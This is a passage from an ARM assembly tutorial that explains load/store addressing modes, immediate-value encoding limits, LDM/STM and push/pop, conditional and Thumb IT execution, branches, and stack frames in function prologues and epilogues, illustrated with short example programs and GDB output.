    The second STR operation uses the pre-indexed address mode. This means, it performs the same action as the previous operation, with the difference that it updates the base register R1 with the calculated memory address afterwards. In other words, it will first store the value found at the memory address R1 (0x1009c) + the offset left shifted by #2 (0x03 LSL#2 = 0xC) = 0x100a8, and update R1 with 0x100a8.

    gef> info register r1
    r1      0x100a8      65704

    The last LDR operation uses the post-indexed address mode. This means, it loads the value at the memory address found in R1 (0x100a8) into register R3, then updates the base register R1 with the value calculated with r2, LSL#2. In other words, R1 gets updated with the value R1 (0x100a8) + the offset R2 (0x3) left shifted by #2 (0xC) = 0x100b4.

    gef> info register r1
    r1      0x100b4      65716

    Summary

    Remember the three offset modes in LDR/STR:

    1. offset mode uses an immediate as offset
      • ldr   r3, [r1, #4]
    2. offset mode uses a register as offset
      • ldr   r3, [r1, r2]
    3. offset mode uses a scaled register as offset
      • ldr   r3, [r1, r2, LSL#2]

    How to remember the different address modes in LDR/STR:

    • If there is a !, it’s prefix address mode
      • ldr   r3, [r1, #4]!
      • ldr   r3, [r1, r2]!
      • ldr   r3, [r1, r2, LSL#2]!
    • If the base register is in brackets by itself, it’s postfix address mode
      • ldr   r3, [r1], #4
      • ldr   r3, [r1], r2
      • ldr   r3, [r1], r2, LSL#2
    • Anything else is offset address mode.
      • ldr   r3, [r1, #4]
      • ldr   r3, [r1, r2]
      • ldr   r3, [r1, r2, LSL#2]
    LDR FOR PC-RELATIVE ADDRESSING

    LDR is not only used to load data from memory into a register. Sometimes you will see syntax like this:

    .section .text
    .global _start
    
    _start:
       ldr r0, =jump        /* load the address of the function label jump into R0 */
       ldr r1, =0x68DB00AD  /* load the value 0x68DB00AD into R1 */
    jump:
       ldr r2, =511         /* load the value 511 into R2 */ 
       bkpt

    These instructions are technically called pseudo-instructions. We can use this syntax to reference data in the literal pool. The literal pool is a memory area in the same section (because the literal pool is part of the code) to store constants, strings, or offsets. In the example above we use these pseudo-instructions to reference an offset to a function, and to move a 32-bit constant into a register in one instruction. The reason why we sometimes need to use this syntax to move a 32-bit constant into a register in one instruction is because ARM can only load a 8-bit value in one go. What? To understand why, you need to know how immediate values are being handled on ARM.

    USING IMMEDIATE VALUES ON ARM

    Loading immediate values in a register on ARM is not as straightforward as it is on x86. There are restrictions on which immediate values you can use. What these restrictions are and how to deal with them isn’t the most exciting part of ARM assembly, but bear with me, this is just for your understanding and there are tricks you can use to bypass these restrictions (hint: LDR).

    We know that each ARM instruction is 32bit long, and all instructions are conditional. There are 16 condition codes which we can use and one condition code takes up 4 bits of the instruction. Then we need 2 bits for the destination register. 2 bits for the first operand register, and 1 bit for the set-status flag, plus an assorted number of bits for other matters like the actual opcodes. The point here is, that after assigning bits to instruction-type, registers, and other fields, there are only 12 bits left for immediate values, which will only allow for 4096 different values.

    This means that the ARM instruction is only able to use a limited range of immediate values with MOV directly.  If a number can’t be used directly, it must be split into parts and pieced together from multiple smaller numbers.

    But there is more. Instead of taking the 12 bits for a single integer, those 12 bits are split into an 8bit number (n) being able to load any 8-bit value in the range of 0-255, and a 4bit rotation field (r) being a right rotate in steps of 2 between 0 and 30. This means that the full immediate value v is given by the formula: v = n ror 2*r. In other words, the only valid immediate values are rotated bytes (values that can be reduced to a byte rotated by an even number).

    Here are some examples of valid and invalid immediate values:

    Valid values:
    #256        // 1 ror 24 --> 256
    #384        // 6 ror 26 --> 384
    #484        // 121 ror 30 --> 484
    #16384      // 1 ror 18 --> 16384
    #2030043136 // 121 ror 8 --> 2030043136
    #0x06000000 // 6 ror 8 --> 100663296 (0x06000000 in hex)
    
    Invalid values:
    #370        // 185 ror 31 --> 31 is not in range (0 – 30)
    #511        // 1 1111 1111 --> bit-pattern can’t fit into one byte
    #0x06010000 // 1 1000 0001.. --> bit-pattern can’t fit into one byte

    This has the consequence that it is not possible to load a full 32bit address in one go. We can bypass this restrictions by using one of the following two options:

    1. Construct a larger value out of smaller parts
      1. Instead of using MOV  r0, #511
      2. Split 511 into two parts: MOV r0, #256, and ADD r0, #255
    2. Use a load construct ‘ldr r1,=value’ which the assembler will happily convert into a MOV, or a PC-relative load if that is not possible.
      1. LDR r1, =511

    If you try to load an invalid immediate value the assembler will complain and output an error saying: Error: invalid constant. If you encounter this error, you now know what it means and what to do about it.
    Let’s say you want to load #511 into R0.

    .section .text
    .global _start
    
    _start:
        mov     r0, #511
        bkpt

    If you try to assemble this code, the assembler will throw an error:

    azeria@labs:~$ as test.s -o test.o
    test.s: Assembler messages:
    test.s:5: Error: invalid constant (1ff) after fixup

    You need to either split 511 in multiple parts or you use LDR as I described before.

    .section .text
    .global _start
    
    _start:
     mov r0, #256   /* 1 ror 24 = 256, so it's valid */
     add r0, #255   /* 255 ror 0 = 255, valid. r0 = 256 + 255 = 511 */
     ldr r1, =511   /* load 511 from the literal pool using LDR */
     bkpt

    If you need to figure out if a certain number can be used as a valid immediate value, you don’t need to calculate it yourself. You can use my little python script called rotator.py which takes your number as an input and tells you if it can be used as a valid immediate number.

    azeria@labs:~$ python rotator.py
    Enter the value you want to check: 511
    
    Sorry, 511 cannot be used as an immediate number and has to be split.
    
    azeria@labs:~$ python rotator.py
    Enter the value you want to check: 256
    
    The number 256 can be used as a valid immediate number.
    1 ror 24 --> 256
    LOAD/STORE MULTIPLE

    Sometimes it is more efficient to load (or store) multiple values at once. For that purpose we use LDM (load multiple) and STM (store multiple). These instructions have variations which basically differ only by the way the initial address is accessed. This is the code we will use in this section. We will go through each instruction step by step.

    .data
    
    array_buff:
     .word 0x00000000             /* array_buff[0] */
     .word 0x00000000             /* array_buff[1] */
     .word 0x00000000             /* array_buff[2]. This element has a relative address of array_buff+8 */
     .word 0x00000000             /* array_buff[3] */
     .word 0x00000000             /* array_buff[4] */
    
    .text
    .global _start
    
    _start:
     adr r0, words+12             /* address of words[3] -> r0 */
     ldr r1, array_buff_bridge    /* address of array_buff[0] -> r1 */
     ldr r2, array_buff_bridge+4  /* address of array_buff[2] -> r2 */
     ldm r0, {r4,r5}              /* words[3] -> r4 = 0x03; words[4] -> r5 = 0x04 */
     stm r1, {r4,r5}              /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04 */
     ldmia r0, {r4-r6}            /* words[3] -> r4 = 0x03, words[4] -> r5 = 0x04; words[5] -> r6 = 0x05; */
     stmia r1, {r4-r6}            /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04; r6 -> array_buff[2] = 0x05 */
     ldmib r0, {r4-r6}            /* words[4] -> r4 = 0x04; words[5] -> r5 = 0x05; words[6] -> r6 = 0x06 */
     stmib r1, {r4-r6}            /* r4 -> array_buff[1] = 0x04; r5 -> array_buff[2] = 0x05; r6 -> array_buff[3] = 0x06 */
     ldmda r0, {r4-r6}            /* words[3] -> r6 = 0x03; words[2] -> r5 = 0x02; words[1] -> r4 = 0x01 */
     ldmdb r0, {r4-r6}            /* words[2] -> r6 = 0x02; words[1] -> r5 = 0x01; words[0] -> r4 = 0x00 */
     stmda r2, {r4-r6}            /* r6 -> array_buff[2] = 0x02; r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00 */
     stmdb r2, {r4-r5}            /* r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00; */
     bx lr
    
    words:
     .word 0x00000000             /* words[0] */
     .word 0x00000001             /* words[1] */
     .word 0x00000002             /* words[2] */
     .word 0x00000003             /* words[3] */
     .word 0x00000004             /* words[4] */
     .word 0x00000005             /* words[5] */
     .word 0x00000006             /* words[6] */
    
    array_buff_bridge:
     .word array_buff             /* address of array_buff, or in other words - array_buff[0] */
     .word array_buff+8           /* address of array_buff[2] */

    Before we start, keep in mind that a .word refers to a data (memory) block of 32 bits = 4 BYTES. This is important for understanding the offsetting. So the program consists of .data section where we allocate an empty array (array_buff) having 5 elements. We will use this as a writable memory location to STORE data. The .text section contains our code with the memory operation instructions and a read-only data pool containing two labels: one for an array having 7 elements, another for “bridging” .text and .data sections so that we can access the array_buff residing in the .data section.

    adr r0, words+12             /* address of words[3] -> r0 */

    We use ADR instruction (lazy approach) to get the address of the 4th (words[3]) element into the R0. We point to the middle of the words array because we will be operating forwards and backwards from there.

    gef> break _start 
    gef> run
    gef> nexti

    R0 now contains the address of word[3], which in this case is 0x80B8. This means, our array starts at the address of word[0]: 0x80AC (0x80B8 –  0xC).

    gef> x/7w 0x00080AC
    0x80ac <words>: 0x00000000 0x00000001 0x00000002 0x00000003
    0x80bc <words+16>: 0x00000004 0x00000005 0x00000006

    We prepare R1 and R2 with the addresses of the first (array_buff[0]) and third (array_buff[2]) elements of the array_buff array. Once the addresses are obtained, we can start operating on them.

    ldr r1, array_buff_bridge    /* address of array_buff[0] -> r1 */
    ldr r2, array_buff_bridge+4  /* address of array_buff[2] -> r2 */

    After executing the two instructions above, R1 and R2 contain the addresses of array_buff[0] and array_buff[2].

    gef> info register r1 r2
    r1      0x100d0     65744
    r2      0x100d8     65752

    The next instruction uses LDM to load two word values from the memory pointed by R0. So because we made R0 point to words[3] element earlier, the words[3] value goes to R4 and the words[4] value goes to R5.

    ldm r0, {r4,r5}              /* words[3] -> r4 = 0x03; words[4] -> r5 = 0x04 */

    We loaded multiple (2 data blocks) with one command, which set R4 = 0x00000003 and R5 = 0x00000004.

    gef> info registers r4 r5
    r4      0x3      3
    r5      0x4      4

    So far so good. Now let’s perform the STM instruction to store multiple values to memory. The STM instruction in our code takes values (0x3 and 0x4) from registers R4 and R5 and stores these values to a memory location specified by R1. We previously set the R1 to point to the first array_buff element so after this operation the array_buff[0] = 0x00000003 and array_buff[1] = 0x00000004. If not specified otherwise, the LDM and STM opperate on a step of a word (32 bits = 4 byte).

    stm r1, {r4,r5}              /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04 */

    The values 0x3 and 0x4 should now be stored at the memory address 0x100D0 and 0x100D4. The following instruction inspects two words of memory at the address 0x000100D0.

    gef> x/2w 0x000100D0
    0x100d0 <array_buff>:  0x3   0x4

    As mentioned before, LDM and STM have variations. The type of variation is defined by the suffix of the instruction. Suffixes used in the example are: -IA (increase after), -IB (increase before), -DA (decrease after), -DB (decrease before). These variations differ by the way how they access the memory specified by the first operand (the register storing the source or destination address). In practice, LDM is the same as LDMIA, which means that the address for the next element to be loaded is increased after each load. In this way we get a sequential (forward) data loading from the memory address specified by the first operand (register storing the source address).

    ldmia r0, {r4-r6} /* words[3] -> r4 = 0x03, words[4] -> r5 = 0x04; words[5] -> r6 = 0x05; */ 
    stmia r1, {r4-r6} /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04; r6 -> array_buff[2] = 0x05 */

    After executing the two instructions above, the registers R4-R6 and the memory addresses 0x000100D0, 0x000100D4, and 0x000100D8 contain the values 0x3, 0x4, and 0x5.

    gef> info registers r4 r5 r6
    r4     0x3     3
    r5     0x4     4
    r6     0x5     5
    gef> x/3w 0x000100D0
    0x100d0 <array_buff>: 0x00000003  0x00000004  0x00000005

    The LDMIB instruction first increases the source address by 4 bytes (one word value) and then performs the first load. In this way we still have a sequential (forward) loading of data, but the first element is with a 4 byte offset from the source address. That’s why in our example the first element to be loaded from the memory into the R4 by LDMIB instruction is 0x00000004 (the words[4]) and not the 0x00000003 (words[3]) as pointed by the R0.

    ldmib r0, {r4-r6}            /* words[4] -> r4 = 0x04; words[5] -> r5 = 0x05; words[6] -> r6 = 0x06 */
    stmib r1, {r4-r6}            /* r4 -> array_buff[1] = 0x04; r5 -> array_buff[2] = 0x05; r6 -> array_buff[3] = 0x06 */

    After executing the two instructions above, the registers R4-R6 and the memory addresses 0x100D4, 0x100D8, and 0x100DC contain the values 0x4, 0x5, and 0x6.

    gef> x/3w 0x100D4
    0x100d4 <array_buff+4>: 0x00000004  0x00000005  0x00000006
    gef> info register r4 r5 r6
    r4     0x4    4
    r5     0x5    5
    r6     0x6    6

    When we use the LDMDA instruction everything starts to operate backwards. R0 points to words[3]. When loading starts we move backwards and load the words[3], words[2] and words[1] into R6, R5, R4. Yes, registers are also loaded backwards. So after the instruction finishes R6 = 0x00000003, R5 = 0x00000002, R4 = 0x00000001. The logic here is that we move backwards because we Decrement the source address AFTER each load. The backward registry loading happens because with every load we decrement the memory address and thus decrement the registry number to keep up with the logic that higher memory addresses relate to higher registry number. Check out the LDMIA (or LDM) example, we loaded lower registry first because the source address was lower, and then loaded the higher registry because the source address increased.

    Load multiple, decrement after:

    ldmda r0, {r4-r6} /* words[3] -> r6 = 0x03; words[2] -> r5 = 0x02; words[1] -> r4 = 0x01 */

    Registers R4, R5, and R6 after execution:

    gef> info register r4 r5 r6
    r4     0x1    1
    r5     0x2    2
    r6     0x3    3

    Load multiple, decrement before:

    ldmdb r0, {r4-r6} /* words[2] -> r6 = 0x02; words[1] -> r5 = 0x01; words[0] -> r4 = 0x00 */

    Registers R4, R5, and R6 after execution:

    gef> info register r4 r5 r6
    r4 0x0 0
    r5 0x1 1
    r6 0x2 2

    Store multiple, decrement after.

    stmda r2, {r4-r6} /* r6 -> array_buff[2] = 0x02; r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00 */

    Memory addresses of array_buff[2], array_buff[1], and array_buff[0] after execution:

    gef> x/3w 0x100D0
    0x100d0 <array_buff>: 0x00000000 0x00000001 0x00000002

    Store multiple, decrement before:

    stmdb r2, {r4-r5} /* r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00; */

    Memory addresses of array_buff[1] and array_buff[0] after execution:

    gef> x/2w 0x100D0
    0x100d0 <array_buff>: 0x00000000 0x00000001
    PUSH AND POP

    There is a memory location within the process called Stack. The Stack Pointer (SP) is a register which, under normal circumstances, will always point to an address wihin the Stack’s memory region. Applications often use Stack for temporary data storage. And As mentioned before, ARM uses a Load/Store model for memory access, which means that the instructions LDR / STR or their derivatives (LDM.. /STM..) are used for memory operations. In x86, we use PUSH and POP to load and store from and onto the Stack. In ARM, we can use these two instructions too:

    When we PUSH something onto the Full Descending stack the following happens:

    1. First, the address in SP gets DECREASED by 4.
    2. Second, information gets stored to the new address pointed by SP.

    When we POP something off the stack, the following happens:

    1. The value at the current SP address is loaded into a certain register,
    2. Address in SP gets INCREASED by 4.

    In the following example we use both PUSH/POP and LDMIA/STMDB:

    .text
    .global _start
    
    _start:
       mov r0, #3
       mov r1, #4
       push {r0, r1}
       pop {r2, r3}
       stmdb sp!, {r0, r1}
       ldmia sp!, {r4, r5}
       bkpt

    Let’s look at the disassembly of this code.

    azeria@labs:~$ as pushpop.s -o pushpop.o
    azeria@labs:~$ ld pushpop.o -o pushpop
    azeria@labs:~$ objdump -D pushpop
    pushpop: file format elf32-littlearm
    
    Disassembly of section .text:
    
    00008054 <_start>:
     8054: e3a00003 mov r0, #3
     8058: e3a01004 mov r1, #4
     805c: e92d0003 push {r0, r1}
     8060: e8bd000c pop {r2, r3}
     8064: e92d0003 push {r0, r1}
     8068: e8bd0030 pop {r4, r5}
     806c: e1200070 bkpt 0x0000

    As you can see, our LDMIA and STMDB instuctions got translated to PUSH and POP. That’s because PUSH is a synonym for STMDB sp!, reglist and POP is a synonym for LDMIA sp! reglist (see ARM Manual)

    Let’s run this code in GDB.

    gef> break _start
    gef> run
    gef> nexti 2
    [...]
    gef> x/w $sp
    0xbefff7e0: 0x00000001

    After running the first two instructions we quickly checked what memory address and value SP points to. The next PUSH instruction should decrease SP by 8, and store the value of R1 and R0 (in that order) onto the Stack.

    gef> nexti
    [...] ----- Stack -----
    0xbefff7d8|+0x00: 0x3 <- $sp
    0xbefff7dc|+0x04: 0x4
    0xbefff7e0|+0x08: 0x1
    [...] 
    gef> x/w $sp
    0xbefff7d8: 0x00000003

    Next, these two values (0x3 and 0x4) are poped off the Stack into the registers, so that R2 = 0x3 and R3 = 0x4. SP is increased by 8:

    gef> nexti
    gef> info register r2 r3
    r2     0x3    3
    r3     0x4    4
    gef> x/w $sp
    0xbefff7e0: 0x00000001
    CONDITIONAL EXECUTION

    We already briefly touched the conditions’ topic while discussing the CPSR register. We use conditions for controlling the program’s flow during it’s runtime usually by making jumps (branches) or executing some instruction only when a condition is met. The condition is described as the state of a specific bit in the CPSR register. Those bits change from time to time based on the outcome of some instructions. For example, when we compare two numbers and they turn out to be equal, we trigger the Zero bit (Z = 1), because under the hood the following happens: a – b = 0. In this case we have EQual condition. If the first number was bigger, we would have a Greater Than condition and in the opposite case – Lower Than. There are more conditions, like Lower or Equal (LE), Greater or Equal (GE) and so on.

    The following table lists the available condition codes, their meanings, and the status of the flags that are tested.

    We can use the following piece of code to look into a practical use case of conditions where we perform conditional addition.

    .global main
    
    main:
            mov     r0, #2     /* setting up initial variable */
            cmp     r0, #3     /* comparing r0 to number 3. Negative bit get's set to 1 */
            addlt   r0, r0, #1 /* increasing r0 IF it was determined that it is smaller (lower than) number 3 */
            cmp     r0, #3     /* comparing r0 to number 3 again. Zero bit gets set to 1. Negative bit is set to 0 */
            addlt   r0, r0, #1 /* increasing r0 IF it was determined that it is smaller (lower than) number 3 */
            bx      lr

    The first CMP instruction in the code above triggers Negative bit to be set (2 – 3 = -1) indicating that the value in r0 is Lower Than number 3. Subsequently, the ADDLT instruction is executed because LT condition is full filled when V != N (values of overflow and negative bits in the CPSR are different). Before we execute second CMP, our r0 = 3. That’s why second CMP clears out Negative bit (because 3 – 3 = 0, no need to set the negative flag) and sets the Zero flag (Z = 1). Now we have V = 0 and N = 0 which results in LT condition to fail. As a result, the second ADDLT is not executed and r0 remains unmodified. The program exits with the result 3.

    CONDITIONAL EXECUTION IN THUMB

    In the Instruction Set chapter we talked about the fact that there are different Thumb versions. Specifically, the Thumb version which allows conditional execution (Thumb-2). Some ARM processor versions support the “IT” instruction that allows up to 4 instructions to be executed conditionally in Thumb state.

    Reference: http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0552a/BABIJDIC.html

    Syntax: IT{x{y{z}}} cond

    • cond specifies the condition for the first instruction in the IT block
    • x specifies the condition switch for the second instruction in the IT block
    • y specifies the condition switch for the third instruction in the IT block
    • z specifies the condition switch for the fourth instruction in the IT block

    The structure of the IT instruction is “IF-Then-(Else)” and the syntax is a construct of the two letters T and E:

    • IT refers to If-Then (next instruction is conditional)
    • ITT refers to If-Then-Then (next 2 instructions are conditional)
    • ITE refers to If-Then-Else (next 2 instructions are conditional)
    • ITTE refers to If-Then-Then-Else (next 3 instructions are conditional)
    • ITTEE refers to If-Then-Then-Else-Else (next 4 instructions are conditional)

    Each instruction inside the IT block must specify a condition suffix that is either the same or logical inverse. This means that if you use ITE, the first and second instruction (If-Then) must have the same condition suffix and the third (Else) must have the logical inverse of the first two. Here are some examples from the ARM reference manual which illustrates this logic:

    ITTE   NE           ; Next 3 instructions are conditional
    ANDNE  R0, R0, R1   ; ANDNE does not update condition flags
    ADDSNE R2, R2, #1   ; ADDSNE updates condition flags
    MOVEQ  R2, R3       ; Conditional move
    
    ITE    GT           ; Next 2 instructions are conditional
    ADDGT  R1, R0, #55  ; Conditional addition in case the GT is true
    ADDLE  R1, R0, #48  ; Conditional addition in case the GT is not true
    
    ITTEE  EQ           ; Next 4 instructions are conditional
    MOVEQ  R0, R1       ; Conditional MOV
    ADDEQ  R2, R2, #10  ; Conditional ADD
    ANDNE  R3, R3, #1   ; Conditional AND
    BNE.W  dloop        ; Branch instruction can only be used in the last instruction of an IT block

    Wrong syntax:

    IT     NE           ; Next instruction is conditional     
    ADD    R0, R0, R1   ; Syntax error: no condition code used in IT block.

    Here are the conditional codes and their opposite:

    Let’s try this out with the following example code:

    .syntax unified    @ this is important!
    .text
    .global _start
    
    _start:
        .code 32
        add r3, pc, #1   @ increase value of PC by 1 and add it to R3
        bx r3            @ branch + exchange to the address in R3 -> switch to Thumb state because LSB = 1
    
        .code 16         @ Thumb state
        cmp r0, #10      
        ite eq           @ if R0 is equal 10...
        addeq r1, #2     @ ... then R1 = R1 + 2
        addne r1, #3     @ ... else R1 = R1 + 3
        bkpt

    .code 32

    This example code starts in ARM state. The first instruction adds the address specified in PC plus 1 to R3 and then branches to the address in R3.  This will cause a switch to Thumb state, because the LSB (least significant bit) is 1 and therefore not 4 byte aligned. It’s important to use bx (branch + exchange) for this purpose. After the branch the T (Thumb) flag is set and we are in Thumb state.

    .code 16

    In Thumb state we first compare R0 with #10, which will set the Negative flag (0 – 10 = – 10). Then we use an If-Then-Else block. This block will skip the ADDEQ instruction because the Z (Zero) flag is not set and will execute the ADDNE instruction because the result was NE (not equal) to 10.

    Stepping through this code in GDB will mess up the result, because you would execute both instructions in the ITE block. However running the code in GDB without setting a breakpoint and stepping through each instruction will yield to the correct result setting R1 = 3.

    BRANCHES

    Branches (aka Jumps) allow us to jump to another code segment. This is useful when we need to skip (or repeat) blocks of codes or jump to a specific function. Best examples of such a use case are IFs and Loops. So let’s look into the IF case first.

    .global main
    
    main:
            mov     r1, #2     /* setting up initial variable a */
            mov     r2, #3     /* setting up initial variable b */
            cmp     r1, r2     /* comparing variables to determine which is bigger */
            blt     r1_lower   /* jump to r1_lower in case r2 is bigger (N==1) */
            mov     r0, r1     /* if branching/jumping did not occur, r1 is bigger (or the same) so store r1 into r0 */
            b       end        /* proceed to the end */
    r1_lower:
            mov r0, r2         /* We ended up here because r1 was smaller than r2, so move r2 into r0 */
            b end              /* proceed to the end */
    end:
            bx lr              /* THE END */

    The code above simply checks which of the initial numbers is bigger and returns it as an exit code. A C-like pseudo-code would look like this:

    int main() {
       int max = 0;
       int a = 2;
       int b = 3;
       if(a < b) {
        max = b;
       }
       else {
        max = a;
       }
       return max;
    }

    Now here is how we can use conditional and unconditional branches to create a loop.

    .global main
    
    main:
            mov     r0, #0     /* setting up initial variable a */
    loop:
            cmp     r0, #4     /* checking if a==4 */
            beq     end        /* proceeding to the end if a==4 */
            add     r0, r0, #1 /* increasing a by 1 if the jump to the end did not occur */
            b loop             /* repeating the loop */
    end:
            bx lr              /* THE END */

    A C-like pseudo-code of such a loop would look like this:

    int main() {
       int a = 0;
       while(a < 4) {
       a= a+1;
       }
       return a;
    }

    B / BX / BLX

    There are three types of branching instructions:

    • Branch (B)
      • Simple jump to a function
    • Branch link (BL)
      • Saves (PC+4) in LR and jumps to function
    • Branch exchange (BX) and Branch link exchange (BLX)
      • Same as B/BL + exchange instruction set (ARM <-> Thumb)
      • Needs a register as first operand: BX/BLX reg

    BX/BLX is used to exchange the instruction set from ARM to Thumb.

    .text
    .global _start
    
    _start:
         .code 32         @ ARM mode
         add r2, pc, #1   @ put PC+1 into R2
         bx r2            @ branch + exchange to R2
    
        .code 16          @ Thumb mode
         mov r0, #1

    The trick here is to take the current value of the actual PC, increase it by 1, store the result to a register, and branch (+exchange) to that register. We see that the addition (add r2, pc, #1) will simply take the effective PC address (which is the current PC register’s value + 8 -> 0x805C) and add 1 to it (0x805C + 1 = 0x805D). Then, the exchange happens if the Least Significant Bit (LSB) of the address we branch to is 1 (which is the case, because 0x805D = 10000000 01011101), meaning the address is not 4 byte aligned. Branching to such an address won’t cause any misalignment issues. This is how it would look like in GDB (with GEF extension):

    Please note that the GIF above was created using the older version of GEF so it’s very likely that you see a slightly different UI and different offsets. Nevertheless, the logic is the same.

    Conditional Branches

    Branches can also be executed conditionally and used for branching to a function if a specific condition is met. Let’s look at a very simple example of a conditional branch suing BEQ. This piece of assembly does nothing interesting other than moving values into registers and branching to another function if a register is equal to a specified value. 

    .text
    .global _start
    
    _start:
       mov r0, #2
       mov r1, #2
       add r0, r0, r1
       cmp r0, #4
       beq func1
       add r1, #5
       b func2
    func1:
       mov r1, r0
       bx  lr
    func2:
       mov r0, r1
       bx  lr
    STACK AND FUNCTIONS

    In this part we will look into a special memory region of the process called the Stack. This chapter covers Stack’s purpose and operations related to it. Additionally, we will go through the implementation, types and differences of functions in ARM.

    STACK

    Generally speaking, the Stack is a memory region within the program/process. This part of the memory gets allocated when a process is created. We use Stack for storing temporary data such as local variables of some function, environment variables which helps us to transition between the functions, etc. We interact with the stack using PUSH and POP instructions. As explained in  Memory Instructions: Load And Store PUSH and POP are aliases to some other memory related instructions rather than real instructions, but we use PUSH and POP for simplicity reasons.

    Before we look into a practical example it is import for us to know that the Stack can be implemented in various ways. First, when we say that Stack grows, we mean that an item (32 bits of data) is put on to the Stack. The stack can grow UP (when the stack is implemented in a Descending fashion) or DOWN (when the stack is implemented in a Ascending fashion). The actual location where the next (32 bit) piece of information will be put is defined by the Stack Pointer, or to be precise, the memory address stored in the SP register. Here again, the address could be pointing to the current (last) item in the stack or the next available memory slot for the item. If the SP is currently pointing to the last item in the stack (Full stack implementation) the SP will be decreased (in case of Descending Stack) or increased (in case of Ascending Stack) and only then the item will placed in the Stack. If the SP is currently pointing to the next empty slot in the Stack, the data will be first placed and only then the SP will be decreased (Descending Stack) or increased (Ascending Stack).

     

    As a summary of different Stack implementations we can use the following table which describes which Store Multiple/Load Multiple instructions are used in different cases.

    In our examples we will use the Full descending Stack. Let’s take a quick look into a simple exercise which deals with such a Stack and it’s Stack Pointer.

    /* azeria@labs:~$ as stack.s -o stack.o && gcc stack.o -o stack && gdb stack */
    .global main
    
    main:
         mov   r0, #2  /* set up r0 */
         push  {r0}    /* save r0 onto the stack */
         mov   r0, #3  /* overwrite r0 */
         pop   {r0}    /* restore r0 to it's initial state */
         bx    lr      /* finish the program */

    At the beginning, the Stack Pointer points to address 0xbefff6f8 (could be different in your case), which represents the last item in the Stack. At this moment, we see that it stores some value (again, the value can be different in your case):

    gef> x/1x $sp
    0xbefff6f8: 0xb6fc7000

    After executing the first (MOV) instruction, nothing changes in terms of the Stack. When we execute the PUSH instruction, the following happens: first, the value of SP is decreased by 4 (4 bytes = 32 bits). Then, the contents of R0 are stored to the new address specified by SP. When we now examine the updated memory location referenced by SP, we see that a 32 bit value of integer 2 is stored at that location:

    gef> x/x $sp
    0xbefff6f4: 0x00000002

    The instruction (MOV r0, #3) in our example is used to simulate the corruption of the R0. We then use POP to restore a previously saved value of R0. So when the POP gets executed, the following happens: first, 32 bits of data are read from the memory location (0xbefff6f4) currently pointed by the address in SP. Then, the SP register’s value is increased by 4 (becomes 0xbefff6f8 again). The register R0 contains integer value 2 as a result.

    gef> info registers r0
    r0       0x2          2

    (Please note that the following gif shows the stack having the lower addresses at the top and the higher addresses at the bottom, rather than the other way around like in the first illustration of different Stack variations. The reason for this is to make it look like the Stack view you see in GDB)

    We will see that functions take advantage of Stack for saving local variables, preserving register state, etc. To keep everything organized, functions use Stack Frames, a localized memory portion within the stack which is dedicated for a specific function. A stack frame gets created in the prologue (more about this in the next section) of a function. The Frame Pointer (FP) is set to the bottom of the stack frame and then stack buffer for the Stack Frame is allocated. The stack frame (starting from it’s bottom) generally contains the return address (previous LR), previous Frame Pointer, any registers that need to be preserved, function parameters (in case the function accepts more than 4), local variables, etc. While the actual contents of the Stack Frame may vary, the ones outlined before are the most common. Finally, the Stack Frame gets destroyed during the epilogue of a function.

    Here is an abstract illustration of a Stack Frame within the stack:

    As a quick example of a Stack Frame visualization, let’s use this piece of code:

    /* azeria@labs:~$ gcc func.c -o func && gdb func */
    int main()
    {
     int res = 0;
     int a = 1;
     int b = 2;
     res = max(a, b);
     return res;
    }
    
    int max(int a,int b)
    {
     do_nothing();
     if(a<b)
     {
     return b;
     }
     else
     {
     return a;
     }
    }
    int do_nothing()
    {
     return 0;
    }

    In the screenshot below we can see a simple illustration of a Stack Frame through the perspective of GDB debugger.

    We can see in the picture above that currently we are about to leave the function max (see the arrow in the disassembly at the bottom). At this state, the FP (R11) points to 0xbefff254 which is the bottom of our Stack Frame. This address on the Stack (green addresses) stores 0x00010418 which is the return address (previous LR). 4 bytes above this (at 0xbefff250) we have a value 0xbefff26c, which is the address of a previous Frame Pointer. The 0x1 and 0x2 at addresses 0xbefff24c and 0xbefff248 are local variables which were used during the execution of the function max. So the Stack Frame which we just analyzed had only LR, FP and two local variables.

    FUNCTIONS

    To understand functions in ARM we first need to get familiar with the structural parts of a function, which are:

    1. Prologue
    2. Body
    3. Epilogue

    The purpose of the prologue is to save the previous state of the program (by storing values of LR and R11 onto the Stack) and set up the Stack for the local variables of the function. While the implementation of the prologue may differ depending on a compiler that was used, generally this is done by using PUSH/ADD/SUB instructions. An example of a prologue would look like this:

    push   {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    sub    sp, sp, #16  /* End of the prologue. Allocating some buffer on the stack. This also allocates space for the Stack Frame */

    The body part of the function is usually responsible for some kind of unique and specific task. This part of the function may contain various instructions, branches (jumps) to other functions, etc. An example of a body section of a function can be as simple as the following few instructions:

    mov    r0, #1       /* setting up local variables (a=1). This also serves as setting up the first parameter for the function max */
    mov    r1, #2       /* setting up local variables (b=2). This also serves as setting up the second parameter for the function max */
    bl     max          /* Calling/branching to function max */

    The sample code above shows a snippet of a function which sets up local variables and then branches to another function. This piece of code also shows us that the parameters of a function (in this case function max) are passed via registers. In some cases, when there are more than 4 parameters to be passed, we would additionally use the Stack to store the remaining parameters. It is also worth mentioning, that a result of a function is returned via the register R0. So what ever the result of a function (max) turns out to be, we should be able to pick it up from the register R0 right after the return from the function. One more thing to point out is that in certain situations the result might be 64 bits in length (exceeds the size of a 32bit register). In that case we can use R0 combined with R1 to return a 64 bit result.

    The last part of the function, the epilogue, is used to restore the program’s state to it’s initial one (before the function call) so that it can continue from where it left of. For that we need to readjust the Stack Pointer. This is done by using the Frame Pointer register (R11) as a reference and performing add or sub operation. Once we readjust the Stack Pointer, we restore the previously (in prologue) saved register values by poping them from the Stack into respective registers. Depending on the function type, the POP instruction might be the final instruction of the epilogue. However, it might be that after restoring the register values we use BX instruction for leaving the function. An example of an epilogue looks like this:

    sub    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
